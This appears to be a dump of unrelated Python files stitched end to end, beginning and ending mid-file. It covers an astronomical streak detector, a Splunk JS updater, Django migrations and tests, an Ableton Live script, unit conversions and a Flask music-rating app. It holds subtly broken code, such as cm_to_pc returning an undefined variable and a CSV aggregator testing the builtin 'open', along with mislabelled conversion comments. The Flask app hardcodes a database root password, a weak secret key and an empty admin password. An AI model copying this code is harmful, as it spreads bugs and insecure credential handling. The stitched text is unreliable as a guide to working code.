f.write('Streaks detected: ' + str(detected) + '\n' ) f.write('Files with no detections: ' + str(zero_image) + '\n') f.write('Bad files: ' + str(bad_image)+ '\n') temp_string = "\n" temp_string = temp_string.join(bad_image_paths) f.write(temp_string) f.write('\n\n') if arguments.diff: f.write('Streaks found in Files: \n') num = 0 detected = 0 fileCount = 0 zero_image = 0 bad_image = 0 bad_image_paths = [] dfs = [] # print('Computing %d differences' % (ef-sf+1)) for i in range(len(ffs)-1): dfs.append(arguments.file_pathout+'/'+ffs[i+1][len(arguments.file_pathin):]+'DIFF') # mk_diff(ffs[i],ffs[i+1],dfs[i],v) if sf <= 0: sf = 1 if ef <= 0 or ef > len(dfs): ef = len(dfs) if ef <= sf: temp = sf sf = ef ef = temp print('Processing %d files from %d to %d' % ((ef-sf+1), sf, ef)) i = sf-1 for df in dfs[sf-1:ef]: try: mk_diff(ffs[i],ffs[i+1],dfs[i],arguments.v) # num = do_one(df,dsum+'/'+df[df.rfind(os.sep)+1:df.rfind('.')],shape,area,contour) #diff_file = dsum+'/'+df[df.rfind(os.sep)+1:df.find('.')]+'DIFF' #directory one directory back new_dir = arguments.file_pathout+'/'+df[df.rfind(os.sep)+1:df.rfind('.')]+'DIFF' num = do_one(df,new_dir,arguments.shape,arguments.area,arguments.contour) os.remove(df) except: num=-1 sys.stdout.write('X') if num == 0: zero_image += 1 elif num < 0: bad_image += 1 bad_image_paths.append(df) else: detected += int(num) #Counter of how many streaks detected f.write(df + '\n') fileCount += 1 #Counter for how many files analyzed i += 1 print("\n") # Produce and write summary file f.write('\n' 'Files analyzed: ' + str(fileCount)+ '\n' ) f.write('Streaks detected: ' + str(detected) + '\n' ) f.write('Files with no detections: ' + str(zero_image) + '\n') f.write('Bad files: ' + str(bad_image)+ '\n') temp_string = "\n" temp_string = temp_string.join(bad_image_paths) f.write(temp_string) f.close() else: f.close() def do_one(ff,output_path,shape,area,contour): """ process a directory one fits-file (ff) """ try: # Read a fits image and create a Streak instance. streak = Streak(ff,output_path=output_path) # Detect streaks. # streak.shape_cut = .14 # streak.area_cut = 120 # streak.contour_threshold = 12 # Customization of values streak.shape_cut = shape streak.area_cut = area streak.contour_threshold = contour streak.detect() n = len(streak.streaks) except: n = -1 if n > 0: # Write outputs and plot figures. streak.write_outputs() streak.plot_figures() if n == 0: sys.stdout.write('.') elif n < 0: sys.stdout.write('X') elif n < 10: sys.stdout.write('%d' % n) else: sys.stdout.write('*') sys.stdout.flush() return n #def do_one(ff,output_path=None,shape=None,area=None,contour=None): BACKUP """ process a directory one fits-file (ff) """ # Read a fits image and create a Streak instance. streak = Streak(ff,output_path=output_path) # Detect streaks. # streak.shape_cut = .14 # streak.area_cut = 120 # streak.contour_threshold = 12 #Customization of values streak.shape_cut = shape streak.area_cut = area streak.contour_threshold = contour streak.detect() n = len(streak.streaks) # Write outputs and plot figures. 
streak.write_outputs() streak.plot_figures() streakfile=output_path+"/streaks.txt" fp=open(streakfile) lines=fp.readlines() fp.close() #print("streaks found %d" % (len(lines)-1)) #print("%d " % (len(lines)-1)) n = len(lines)-1 if n == 0: sys.stdout.write('.') elif n < 10: sys.stdout.write('%d' % n) else: sys.stdout.write('*') sys.stdout.flush() #Delete/move files if n == 0: shutil.rmtree(output_path) return int(n) #do_one('20151108_MD01_raw/IMG00681.FIT') #do_dir('20151108_MD01_raw') if __name__ == '__main__': try: arguments = get_arg(sys.argv) except: print("An error occored getting the arguments for the function\n") sys.exit(0) #Prints selected folders print("Running in data directory %s" % arguments.file_pathin) print("Outputting in data directory %s" % arguments.file_pathout) do_dir(arguments) #print("Running in data directory %s" % sys.argv[1]) #do_dir(sys.argv[1],sys.argv[2]) # SPDX-FileCopyrightText: 2020 2020 # # SPDX-License-Identifier: Apache-2.0 import os import sys import urllib2 # Only run this script if the search_mrsparkle directory exists here if not os.path.isdir("search_mrsparkle"): print "Couldn't find the search_mrsparkle dir, assuming this is the wrong folder." sys.exit() # URLs for splunk/splunk-sdk-javascript on GitHub github_raw_url = "https://raw.githubusercontent.com/splunk/splunk-sdk-javascript" github_branch_name = "master" splunk_js_url = "/".join([github_raw_url, github_branch_name, "client/splunk.js"]) splunk_js_min_url = "/".join([github_raw_url, github_branch_name, "client/splunk.min.js"]) base_js_path = os.path.sep.join([os.path.abspath(os.path.dirname(__file__)), "search_mrsparkle", "exposed", "js"]) # File paths to update js_contrib_path = os.path.sep.join([base_js_path, "contrib"]) js_splunkjs_path = os.path.sep.join([base_js_path, "splunkjs"]) try : # Update splunk.js print "Trying to download splunk.js from GitHub" splunk_js = urllib2.urlopen(splunk_js_url).read() print "\t success!" print "Trying to update splunk.js in %s" % js_contrib_path splunk_js_file = open(os.path.sep.join([js_contrib_path, "splunk.js"]), "w") splunk_js_file.write(splunk_js) splunk_js_file.close() print "\t success!" print "Trying to update splunk.js in %s" % js_splunkjs_path splunk_js_file = open(os.path.sep.join([js_splunkjs_path, "splunk.js"]), "w") splunk_js_file.write(splunk_js) splunk_js_file.close() print "\t success!" # Update splunk.min.js print "Trying to download splunk.min.js from GitHub" splunk_js = urllib2.urlopen(splunk_js_min_url).read() print "\t success!" print "Trying to update splunk.min.js in %s" % js_contrib_path splunk_js_file = open(os.path.sep.join([js_contrib_path, "splunk.min.js"]), "w") splunk_js_file.write(splunk_js) splunk_js_file.close() print "\t success!" print "Trying to update splunk.min.js in %s" % js_splunkjs_path splunk_js_file = open(os.path.sep.join([js_splunkjs_path, "splunk.min.js"]), "w") splunk_js_file.write(splunk_js) splunk_js_file.close() print "\t success!" # If not exceptions, everything is complete print "Everything completed successfully!" 
except urllib2.URLError as ul2e: print "Error trying to download splunk-sdk-javascript files from GitHub: \n\t %s" % ul2e except IOError as ioe: print "Error trying to write splunk.js and/or splunk.min.js : \n\t %s" % ioe except Error as e: print "Unexpected error %s" % e1-10 from setuptools import setup, find_packages setup( author='', author_email='', description='Tox wrapped in docker', name='boxer', version='0.1', packages=find_packages('boxer', exclude=['tests']), include_package_data=True, url='https://github.com/bradleygolden/boxer', keywords=['tox', 'pyenv', 'docker'], setup_requires=['pytest-runner'], tests_require=['pytest'], install_requires=[ 'Click', 'docker' ], entry_points=''' [console_scripts] boxer=boxer.boxer:cli ''', ) # Generated by Django 3.1.4 on 2021-02-04 05:45 from django.db import migrations class Migration(migrations.Migration): dependencies = [ ('blog', '0016_setting'), ] operations = [ migrations.RemoveField( model_name='category', name='parent', ), migrations.RemoveField( model_name='images', name='product', ), migrations.RemoveField( model_name='product', name='category', ), migrations.DeleteModel( name='Setting', ), migrations.DeleteModel( name='Category', ), migrations.DeleteModel( name='Images', ), migrations.DeleteModel( name='Product', ), ] import csv, datetime record = {} with open('coinbaseUSD.csv', 'r') as csvfile: reader = csv.reader(csvfile) daily_info = {} current_day = 0 volume = 0 usd_spent = 0 open_ = close = None high = low = None for row in reader: if current_day == datetime.datetime.fromtimestamp(int(row[0])).date(): volume = volume + float(row[2]) usd_spent = usd_spent + float(row[2]) * float(row[1]) close = float(row[1]) if open is None: open_ = close if high is None or high < close: high = close if low is None or low > close: low = close else: if volume != 0: record[current_day] = [usd_spent / volume, volume, open, close, high, low] volume = 0 usd_spent = 0 open_ = high = low = None #print(str(current_day) + ': ' + str(usd_spent) + ' ' + str(volume)) else: record[current_day] = 0 current_day = datetime.datetime.fromtimestamp(int(row[0])).date() print(current_day) with open('output.csv', 'w') as csvfile: writer = csv.writer(csvfile) for date, data in record.items(): #print([date]) #print(data) if data != 0: writer.writerow([date] + data) src/PinguinoClassifierTest.py # -*- coding: utf-8 -*- #!/usr/bin/env python3 """ ============================================= Autor: - - - - - Fecha: 13/10/2019 ============================================= Contiene la definición de la clase PinguinoClassifierTest encargada del las pruebas de la clase PinguinoClassifier. ============================================= """ import unittest from PinguinoClassifier import PinguinoClassifier # Imagen de pinguino PINGUINO_FILE = './unit_test_data/pinguino.jpg' # Imagen de no pinguino NOT_PINGUINO_FILE = './unit_test_data/not_pinguino.jpg' class PinguinoClassifierTest(unittest.TestCase): # Prueba el caso de que se pase la imagen de un pinguino def test_predict_true(self): classifier = PinguinoClassifier() self.assertTrue(classifier.predict(PINGUINO_FILE)) # Prueba el caso de que se pase la imagen de algo que no sea # un pinguino def test_predict_false(self): classifier = PinguinoClassifier() self.assertFalse(classifier.predict(NOT_PINGUINO_FILE)) if __name__ == "__main__": unittest.main()1-10 from unittest import mock import pytest from rest_framework import status class BaseDatasetViewTest: """Base test class for dataset view tests. 
When subclassed by a view test class adds authentication and authorization tests common for all views. """ view_url = None factory = None @pytest.mark.parametrize('method', ('delete', 'patch', 'post', 'put')) def test_other_methods_not_allowed( self, data_flow_api_client, method, ): """Test that various HTTP methods are not allowed.""" response = data_flow_api_client.request(method, self.view_url) assert response.status_code == status.HTTP_405_METHOD_NOT_ALLOWED def test_without_scope(self, hawk_api_client): """Test that making a request without the correct Hawk scope returns an error.""" hawk_api_client.set_credentials( 'test-id-without-scope', 'test-key-without-scope', ) response = hawk_api_client.get(self.view_url) assert response.status_code == status.HTTP_403_FORBIDDEN def test_without_credentials(self, api_client): """Test that making a request without credentials returns an error.""" response = api_client.get(self.view_url) assert response.status_code == status.HTTP_401_UNAUTHORIZED def test_without_whitelisted_ip(self, data_flow_api_client): """Test that making a request without the whitelisted IP returns an error.""" data_flow_api_client.set_http_x_forwarded_for('1.1.1.1') response = data_flow_api_client.get(self.view_url) assert response.status_code == status.HTTP_401_UNAUTHORIZED def test_no_data(self, data_flow_api_client): """Test that without any data available, endpoint completes the request successfully""" response = data_flow_api_client.get(self.view_url) assert response.status_code == status.HTTP_200_OK @mock.patch('datahub.dataset.core.pagination.DatasetCursorPagination.page_size', 2) def test_pagination(self, data_flow_api_client): """Test that when page size higher than threshold response returns with next page url""" self.factory.create_batch(2 + 1) response = data_flow_api_client.get(self.view_url) assert response.status_code == status.HTTP_200_OK assert response.json()['next'] is not None def test_pagination_can_be_controlled_by_client(self, data_flow_api_client): """Test that pagination can be controlled by the client""" self.factory.create_batch(2) response_for_page_size_1 = data_flow_api_client.get(self.view_url, params={'page_size': 1}) response_for_page_size_2 = data_flow_api_client.get(self.view_url, params={'page_size': 2}) assert response_for_page_size_1.status_code == status.HTTP_200_OK assert response_for_page_size_2.status_code == status.HTTP_200_OK assert len(response_for_page_size_1.json()['results']) == 1 assert len(response_for_page_size_2.json()['results']) == 2 @mock.patch('datahub.dataset.core.pagination.DatasetCursorPagination.max_page_size', 2) def test_pagination_respects_max_page_size(self, data_flow_api_client): """Test that pagination conrolled by the client cannot bypass our own max page size""" self.factory.create_batch(2) response_for_page_size_1 = data_flow_api_client.get(self.view_url, params={'page_size': 1}) response_for_page_size_10 = data_flow_api_client.get( self.view_url, params={'page_size': 10}, ) assert response_for_page_size_1.status_code == status.HTTP_200_OK assert response_for_page_size_10.status_code == status.HTTP_200_OK assert len(response_for_page_size_1.json()['results']) == 1 assert len(response_for_page_size_10.json()['results']) == 2 NSUSpray/LinkedClips # -*- coding: utf-8 -*- from __future__ import with_statement import Live from _Framework.ControlSurface import ControlSurface class LinkedClips (ControlSurface): u""" Rumotescripts LinkedClips """ def __init__ (self, c_instance): ControlSurface.__init__ (self, 
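# --- Hedged usage sketch (hypothetical subclass, not from the original suite) --
# BaseDatasetViewTest above is meant to be subclassed: a concrete view test only
# supplies `view_url` and a model `factory`, and inherits every authentication,
# pagination and method-not-allowed test.  The class name, URL and factory below
# are placeholders invented for illustration:
class TestExampleDatasetView(BaseDatasetViewTest):
    """Inherits the common dataset-view tests for a hypothetical endpoint."""

    view_url = '/v4/dataset/example-dataset'   # placeholder endpoint
    factory = None                             # replace with the relevant model factory
# -------------------------------------------------------------------------------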
c_instance) with self.component_guard (): self.arrangement_clips = set () self.clip = self.song().view.detail_clip if self.clip: self.clip.add_name_listener (self._on_clip_name_changed) if self.clip.name: self.add_named_clip_listeners () if self.clip.is_arrangement_clip: self._copy_data_from_existing_clip () self.arrangement_clips.add (self.clip) self.song().view.add_detail_clip_listener (self._on_detail_clip_changed) def _on_detail_clip_changed (self): self.schedule_message (1, self._change_clip_listeners) def _change_clip_listeners (self): if self.clip and hasattr (self.clip, 'name'): # left the clip, clip exists (not deleting) self.clip.remove_name_listener (self._on_clip_name_changed) if self.clip.name: self.remove_named_clip_listeners () self._change_another_clips_nonlisteners () ############################ self.clip = self.song().view.detail_clip ############################ if self.clip: self.clip.add_name_listener (self._on_clip_name_changed) if self.clip.name: self.add_named_clip_listeners () if self.clip.is_arrangement_clip: self._copy_data_from_existing_clip () self.arrangement_clips.add (self.clip) def add_named_clip_listeners (self): self._change_named_clip_listeners ('add') def remove_named_clip_listeners (self): self._change_named_clip_listeners ('remove') def _change_named_clip_listeners (self, action): if self.clip.color_has_listener (self._on_clip_color_changed) == (action == 'remove'): # are there any listeners getattr (self.clip, action + '_looping_listener') (self._on_clip_looping_changed) getattr (self.clip, action + '_loop_start_listener') (self._on_clip_loop_start_changed) getattr (self.clip, action + '_loop_end_listener') (self._on_clip_loop_end_changed) getattr (self.clip, action + '_color_listener') (self._on_clip_color_changed) getattr (self.clip, action + '_signature_numerator_listener') (self._on_clip_signature_numerator_changed) getattr (self.clip, action + '_signature_denominator_listener') (self._on_clip_signature_denominator_changed) if self.clip.is_midi_clip: getattr (self.clip, action + '_notes_listener') (self._on_clip_notes_changed) else: # if self.clip.is_audio_clip getattr (self.clip, action + '_gain_listener') (self._on_clip_gain_changed) getattr (self.clip, action + '_pitch_coarse_listener') (self._on_clip_pitch_coarse_changed) getattr (self.clip, action + '_pitch_fine_listener') (self._on_clip_pitch_fine_changed) getattr (self.clip, action + '_warping_listener') (self._on_clip_warping_changed) getattr (self.clip, action + '_warp_mode_listener') (self._on_clip_warp_mode_changed) def _on_clip_name_changed (self): self.schedule_message (1, self._clip_name_changed_actions) # since it is not possible to change the clip inside the listener def _clip_name_changed_actions (self): with Undo (): self._change_another_clips_nonlisteners () if self.clip.name: self.add_named_clip_listeners () if self.clip.is_arrangement_clip: self.arrangement_clips.add (self.clip) self._copy_data_from_existing_clip () else: self.remove_named_clip_listeners () if self.clip.is_arrangement_clip: self.arrangement_clips.remove (self.clip) def _copy_data_from_existing_clip (self): try: clip = self.another_clips().next () except StopIteration: return #################################### looping = clip.looping if clip.is_audio_clip: warping = clip.warping # necessary, because when you turn on the loop the warping is automatically turned on self.clip.looping = clip.looping = True #self.clip.start_marker = clip.start_marker #self.clip.end_marker = clip.end_marker self.clip.loop_start = 
clip.loop_start self.clip.loop_end = clip.loop_end if not looping: self.clip.looping = clip.looping = False if clip.is_audio_clip: self.clip.warping = clip.warping = warping ############################## self.clip.color = clip.color self.clip.signature_numerator = clip.signature_numerator self.clip.signature_denominator = clip.signature_denominator self.clip.view.grid_quantization = clip.view.grid_quantization self.clip.view.grid_is_triplet = clip.view.grid_is_triplet ############################## if self.clip.is_midi_clip: notes = _get_all_notes (clip) if _get_all_notes (self.clip) != notes: _replace_notes (self.clip, notes) else: # if self.clip.is_audio_clip self.clip.gain = clip.gain self.clip.pitch_coarse = clip.pitch_coarse self.clip.pitch_fine = clip.pitch_fine self.clip.warping = clip.warping = warping self.clip.warp_mode = clip.warp_mode def _change_another_clips_nonlisteners (self): def action_for_not_looped_clip (): pass if not self.clip.looping: if self.clip.is_audio_clip: warping = self.clip.warping # necessary, because when you turn on the loop the warping is automatically turned on self.clip.looping = True loop_start = self.clip.loop_start loop_end = self.clip.loop_end self.clip.looping = False if self.clip.is_audio_clip: self.clip.warping = warping def copy_loop_startend (): clip.looping = True clip.loop_start = loop_start clip.loop_end = loop_end clip.looping = False if clip.is_audio_clip: clip.warping = warping action_for_not_looped_clip = copy_loop_startend ######################################## for clip in self.another_clips (): action_for_not_looped_clip () clip.view.grid_quantization = self.clip.view.grid_quantization clip.view.grid_is_triplet = self.clip.view.grid_is_triplet ################################################# ################################################# def _on_clip_looping_changed (self): self.schedule_message (1, self._change_another_clips_looping) def _change_another_clips_looping (self): with Undo (): for clip in self.another_clips (): clip.looping = self.clip.looping def _on_clip_loop_start_changed (self): if self.clip.looping: self.schedule_message (1, self._change_another_clips_loop_start) def _change_another_clips_loop_start (self): with Undo (): for clip in self.another_clips (): clip.loop_start = self.clip.loop_start def _on_clip_loop_end_changed (self): if self.clip.looping: self.schedule_message (1, self._change_another_clips_loop_end) def _change_another_clips_loop_end (self): with Undo (): for clip in self.another_clips (): clip.loop_end = self.clip.loop_end def _on_clip_color_changed (self): self.schedule_message (1, self._change_another_clips_color) # since it is not possible to change the clip inside the listener def _change_another_clips_color (self): with Undo (): for clip in self.another_clips (): clip.color = self.clip.color def _on_clip_signature_numerator_changed (self): self.schedule_message (1, self._change_another_clips_signature_numerator) def _change_another_clips_signature_numerator (self): with Undo (): for clip in self.another_clips (): clip.signature_numerator = self.clip.signature_numerator def _on_clip_signature_denominator_changed (self): self.schedule_message (1, self._change_another_clips_signature_denominator) def _change_another_clips_signature_denominator (self): with Undo (): for clip in self.another_clips (): clip.signature_denominator = self.clip.signature_denominator def _on_clip_notes_changed (self): self.schedule_message (1, self._change_another_clips_notes) # since it is not possible to change the 
clip inside the listener def _change_another_clips_notes (self): notes = _get_all_notes (self.clip) with Undo (): for clip in self.another_clips (): _replace_notes (clip, notes) def _on_clip_gain_changed (self): self.schedule_message (1, self._change_another_clips_gain) def _change_another_clips_gain (self): with Undo (): for clip in self.another_clips (): clip.gain = self.clip.gain def _on_clip_pitch_coarse_changed (self): self.schedule_message (1, self._change_another_clips_pitch_coarse) def _change_another_clips_pitch_coarse (self): with Undo (): for clip in self.another_clips (): clip.pitch_coarse = self.clip.pitch_coarse def _on_clip_pitch_fine_changed (self): self.schedule_message (1, self._change_another_clips_pitch_fine) def _change_another_clips_pitch_fine (self): with Undo (): for clip in self.another_clips (): clip.pitch_fine = self.clip.pitch_fine def _on_clip_warping_changed (self): self.schedule_message (1, self._change_another_clips_warping) def _change_another_clips_warping (self): with Undo (): for clip in self.another_clips (): clip.warping = self.clip.warping def _on_clip_warp_mode_changed (self): self.schedule_message (1, self._change_another_clips_warp_mode) def _change_another_clips_warp_mode (self): with Undo (): for clip in self.another_clips (): clip.warp_mode = self.clip.warp_mode ####################################################### ####################################################### def another_clips (self): """ Return an iterator over all clips of the same type (MIDI/audio), excluding the current one. """ for track in self.song().tracks: if track.has_midi_input != self.clip.is_midi_clip: continue for clip_slot in track.clip_slots: if not clip_slot.has_clip: continue clip = clip_slot.clip if clip.name != self.clip.name: continue if self.clip.is_audio_clip and clip.file_path != self.clip.file_path: clip.name += u'\'' continue if clip != self.clip: yield clip self.arrangement_clips = set (filter (lambda clip: hasattr (clip, 'name'), self.arrangement_clips)) # only really existing clips for clip in self.arrangement_clips: if clip.name != self.clip.name or clip.is_midi_clip != self.clip.is_midi_clip: continue if self.clip.is_audio_clip and clip.file_path != self.clip.file_path: clip.name += u'\'' continue if clip != self.clip: yield clip def _get_all_notes (clip): assert isinstance (clip, Live.Clip.Clip) assert clip.is_midi_clip one_year_at_120bpm_in_beats = 63072000.0 far_time = one_year_at_120bpm_in_beats return clip.get_notes (-far_time, 0, 2*far_time, 128) def _replace_notes (clip, new_notes): assert isinstance (clip, Live.Clip.Clip) assert clip.is_midi_clip assert isinstance (new_notes, tuple) clip.select_all_notes () clip.replace_selected_notes (new_notes) clip.deselect_all_notes () class Undo (object): def __enter__ (self): Live.Application.get_application().get_document().begin_undo_step () def __exit__ (self, type, value, tb): Live.Application.get_application().get_document().end_undo_step () import datetime import pytest from django.utils import timezone @pytest.mark.integration def test_GET_as_other_user(client, client_factory, user_factory): """ Sending a GET request to the view as a non-admin user should return a 404 response. 
""" client.force_login(user_factory()) client_company = client_factory() url = client_company.unapproved_time_record_list_url response = client.get(url) assert response.status_code == 404 @pytest.mark.integration def test_GET_as_supervisor(client, client_admin_factory, time_record_factory): """ Sending a GET request to the view as a client supervisor should list the unapproved time records for the client. """ admin = client_admin_factory() client.force_login(admin.user) start_time = timezone.now() end_time = start_time + datetime.timedelta(hours=8) client_company = admin.client time_record_factory( employee__client=client_company, job__client=client_company, time_start=start_time, ) r1 = time_record_factory( employee__client=client_company, job__client=client_company, time_end=end_time, time_start=start_time, ) r2 = time_record_factory( employee__client=client_company, job__client=client_company, time_end=end_time, time_start=start_time, ) expected_records = [r1, r2] url = client_company.unapproved_time_record_list_url response = client.get(url) assert response.status_code == 200 assert list(response.context_data['time_records']) == expected_records SLAB_Diffusion/distances_conversions.py0 """******************************************************* This module has functions converting distances ***************************************************** """ #print(__doc__) def DM_to_pc(x):#converts distance modulus to distance in parsec psec=10**(x/5+1) return psec def pc_to_cm(x):#convert pc to cm cm=x*3.0857e18 return cm def pc_to_m(x):#convert pc to cm m=x*3.0857e16 return m def cm_to_pc(x): ps=x/(3.0857e18) return pc def solar_radius_to_m(x):#convert pc to cm m=x*6.957e8 return m def solar_radius_to_pc(x):#convert pc to cm m=x*2.25461e-8 return m def cm_to_solar_radius(x): sr=x/6.957e10 return sr def solar_radius_to_cm(x): cm=x*6.957e10 return cm # Generated by Django 3.2.9 on 2021-12-08 05:46 from django.conf import settings from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ migrations.swappable_dependency(settings.AUTH_USER_MODEL), ('gallery', '0006_auto_20211208_0838'), ] operations = [ migrations.RemoveField( model_name='profile', name='following', ), migrations.AddField( model_name='profile', name='followers', field=models.ManyToManyField(blank=True, related_name='followers', to=settings.AUTH_USER_MODEL), ), migrations.DeleteModel( name='FollowSystem', ), ] # Python Standard Libraries import numpy as np # grAdapt from .base import Equidistributed from grAdapt.utils.sampling import sample_points_bounds from grAdapt.utils.math.spatial import pairwise_distances class MaximalMinDistance(Equidistributed): """Maximal min distance sampling method A fixed amount of points are candidates. The candidate is chosen as a point if it has the highest minimal epsilon margin among other points. The minimal epsilon margin is the smallest distance between two points. Each point has an minimal epsilon margin. For a better performance, only a fixed amount of latest points are considered. Has a disadvantage: creates 'evil' neighbours. """ def __init__(self, n_candidates=10, window_size=500): """ Parameters ---------- n_candidates : integer number of candidates window_size : integer size of history points to consider. smaller is faster but worsen the results. 
""" super().__init__() self.n_candidates = n_candidates self.window_size = window_size def sample(self, bounds, n, x_history=None): """Samples low discrepancy/equidistributed sequences Method has to handle with new bounds and n. Parameters ---------- bounds : list of tuples or list of grAdapt.space.datatype.base Each tuple in the list defines the bounds for the corresponding variable Example: [(1, 2), (2, 3), (-1, 4)...] n : int number of points to be sampled x_history : array-like (2d) History points. Consider those to prevent sampling in dense regions. Returns ------- array-like (n, len(bounds)) Returns a 2D array. dim is the dimension of a single point Each row corresponds to a single point. Each column corresponds to a dimension. """ # set to new variables super().sample(bounds, n, x_history) if x_history is None: x_history = sample_points_bounds(self.bounds, 1) x_history_list = list(x_history) else: x_history_list = list(x_history) for i in range(self.n): x_history_sublist = x_history_list[-self.window_size:] candidates = sample_points_bounds(self.bounds, self.n_candidates) dists_matrix = pairwise_distances(candidates, np.array(x_history_sublist)) min_dists = np.min(dists_matrix, axis=1) max_min_dists = np.argmax(min_dists) x_history_list.append(candidates[max_min_dists]) return np.array(x_history_list)[-self.n:] #!/usr/bin/python3 """ This challenge is as follows: The parameter weekday is True if it is a weekday, and the parameter vacation is True if we are on vacation. We sleep in if it is not a weekday or we're on a vacation. Return True if we sleep in. Expected Results: False, False -> True True, False -> False False, True -> True True, True -> True """ def sleep_in(weekday, vacation): # This part is where the challenge is supposed to be solved if weekday: return True if vacation else False return True if __name__ == '__main__': # This part is only to test if challenge is a success print("Scenario 1: False, False: {}".format("success" if sleep_in(False, False) else "fail")) print("Scenario 2: True, False: {}".format("success" if not sleep_in(True, False) else "fail")) print("Scenario 3: False, True: {}".format("success" if sleep_in(False, True) else "fail")) print("Scenario 4: True, True: {}".format("success" if sleep_in(True, True) else "fail")) 0 # encoding=utf-8 from flask import Flask, render_template, session, redirect, url_for, request, flash from flask_script import Manager from flask_bootstrap import Bootstrap from flask_wtf import FlaskForm from wtforms import TextAreaField, SubmitField from wtforms.validators import DataRequired from databaseTransaction import dt from music_clustering import mc from test_decomposition import td import sys import time import numpy as np reload(sys) sys.setdefaultencoding('utf8') class EssayForm(FlaskForm): essay = TextAreaField('待分类文本', validators=[DataRequired()]) submit = SubmitField('提交') app = Flask(__name__) manager = Manager(app) bootstrap = Bootstrap(app) # 连接MYSQL数据库需要的配置信息 app.config['MYSQL_HOST'] = '127.0.0.1' app.config['MYSQL_USER'] = 'root' app.config['MYSQL_PASSWD'] = ',./' app.config['DB_MUSICS'] = 'musicslib' app.config['TABLE_NAME'] = 'musics_info' # 防止CSRF攻击的密钥 app.config['SECRET_KEY'] = 'hard to guess string' # 静态文件路径 app.config['MUSIC_FOLDER'] = 'static/musics' # 音乐导入密码 app.config['IMPORT_PASSWD'] = '' @app.route('/', methods=['GET', 'POST']) def index(): # 在session中记录音乐的数量 if not session.get('num_musics'): session['num_musics'] = 10 # 用户第一次访问时,获取音乐信息,并保存在session中 if not session.get('musics'): # 构造查询语句 query_statement 
= 'SELECT * FROM ' + app.config['TABLE_NAME'] + ' LIMIT 80, 10' # 连接数据库 db = dt.connect_to_database(app.config['MYSQL_HOST'], app.config['MYSQL_USER'], app.config['MYSQL_PASSWD'], app.config['DB_MUSICS']) # 查询音乐信息,并保存在session中 session['musics'] = dt.query(db, query_statement) db.close() # 取得session中音乐的数量 n = session['num_musics'] # 处理POST请求 if request.method == 'POST': # 从form中获得用户评价信息,并写入数据库 judge = request.form.getlist('choice') # 如果一个都没选,代表跳过 if len(judge) == 0: session['num_musics'] -= 1 # 如果已经评完,重定向到完成页面 if session['num_musics'] == 0: session['finish'] = True return redirect(url_for('index')) return redirect(url_for('index')) # 判断选择数量是否符合要求 if len(judge) > 4: flash('最多选4个,请重新选择') return redirect(url_for('index')) # 音乐记录的第零个字段为主键 entry_id = session['musics'][n-1][0] # 连接数据库 db = dt.connect_to_database(app.config['MYSQL_HOST'], app.config['MYSQL_USER'], app.config['MYSQL_PASSWD'], app.config['DB_MUSICS']) # 写数据 dt.write(db, app.config['TABLE_NAME'], entry_id, judge) # 断开连接 db.close() # 更新音乐数量 session['num_musics'] -= 1 # 显示提交成功的提示消息 flash('提交成功,还剩余%d首歌' % session['num_musics']) # 如果已经评完,重定向到完成页面 if session['num_musics'] == 0: session['finish'] = True return redirect(url_for('index')) return redirect(url_for('index')) # 处理GET请求 return render_template('index.html', music=session['musics'][n-1], n=n, finish=session.get('finish')) @app.route('/finish') def finish(): return render_template('finish.html') @app.route('/guide') def guide(): return render_template('guide.html') @app.route('/import', methods=['GET', 'POST']) def import_musics(): # 在session中保存验证信息 if not session.get('verified'): session['verified'] = False # 处理POST请求 if request.method == 'POST': if not session['verified']: passwd = request.form.get('password') if passwd == app.config['IMPORT_PASSWD']: session['verified'] = True return render_template('import.html', verified=session['verified']) else: flash('Verification code is not correct') else: # 获得歌曲信息 names = request.form.getlist('name') urls = request.form.getlist('url') absolutes = request.form.getlist('absolute') # 连接数据库 db = dt.connect_to_database(app.config['MYSQL_HOST'], app.config['MYSQL_USER'], app.config['MYSQL_PASSWD'], app.config['DB_MUSICS']) # 插入新记录 num_musics = dt.insert(db, app.config['TABLE_NAME'], names, absolutes, urls) # 断开连接 db.close() flash('inserted %d new musics' % num_musics) # 处理GET请求 return render_template('import.html', verified=session['verified']) @app.route('/query') def info(): sql_statement = 'SELECT * FROM ' + app.config['TABLE_NAME'] # 连接数据库 db = dt.connect_to_database(app.config['MYSQL_HOST'], app.config['MYSQL_USER'], app.config['MYSQL_PASSWD'], app.config['DB_MUSICS']) musics = dt.query(db, sql_statement) db.close() return render_template('info.html', musics=musics) @app.route('/cluster', methods=['GET', 'POST']) def cluster(): # 构造查询语句 query_statement = 'SELECT * FROM ' + app.config['TABLE_NAME'] # 连接数据库 db = dt.connect_to_database(app.config['MYSQL_HOST'], app.config['MYSQL_USER'], app.config['MYSQL_PASSWD'], app.config['DB_MUSICS']) # 查询音乐信息 musics = dt.query(db, query_statement) db.close() # 音乐的数量 len_m = len(musics) if request.method == 'POST': # 执行聚类算法 try: k = int(request.form.get('k')) except ValueError: flash("请输入整数") return render_template('cluster.html', len_m=len_m) if k < 1: flash("聚类数必须大于等于1") return render_template('cluster.html', len_m=len_m) elif k > len_m: flash("聚类数必须小于等于歌曲的数量: %d" % len_m) return render_template('cluster.html', len_m=len_m) sentiments = mc.get_sentiments(musics) kmeans = 
mc.cluster_musics(list(sentiments), k) img_filename = str(time.time()) + '.png' td.decomp(np.mat(sentiments), img_filename, kmeans.labels_) # 构造聚类字典 clusters = {} num_cluster = len(kmeans.cluster_centers_) for i in range(num_cluster): clusters['%d' % i] = [] # i用于在页面顺序显示聚类 labels = kmeans.labels_.tolist() # print labels for i in range(len(musics)): music_info = [musics[i][1], musics[i][-1]] # 歌名和播放地址 clusters['%d' % labels[i]].append(music_info) # print clusters return render_template('cluster.html', clusters=clusters, len_m=len_m, img_filename=img_filename) return render_template('cluster.html', len_m=len_m) # 此路由用于将聚类结果写入数据库 @app.route('/admin/cluster/') def admin_cluster(k): # 构造查询语句 query_statement = 'SELECT * FROM ' + app.config['TABLE_NAME'] # 连接数据库 db = dt.connect_to_database(app.config['MYSQL_HOST'], app.config['MYSQL_USER'], app.config['MYSQL_PASSWD'], app.config['DB_MUSICS']) # 查询音乐信息 musics = dt.query(db, query_statement) sentiments = mc.get_sentiments(musics) # 获得情感列表 # print 'sentiments:' # print sentiments # print 'k:', k kmeans = mc.cluster_musics(list(sentiments), int(k)) # 聚类 mc.write_cluster_to_database(kmeans.labels_.tolist(), db, app.config['TABLE_NAME']) db.close() return 'Succeed' @app.route('/analysis/') def analysis(essay): from sentimentAnalysis import sa # 导入情感分析模块 print essay word_list = sa.word_segmentation(essay=essay) # 分词 word_freq = 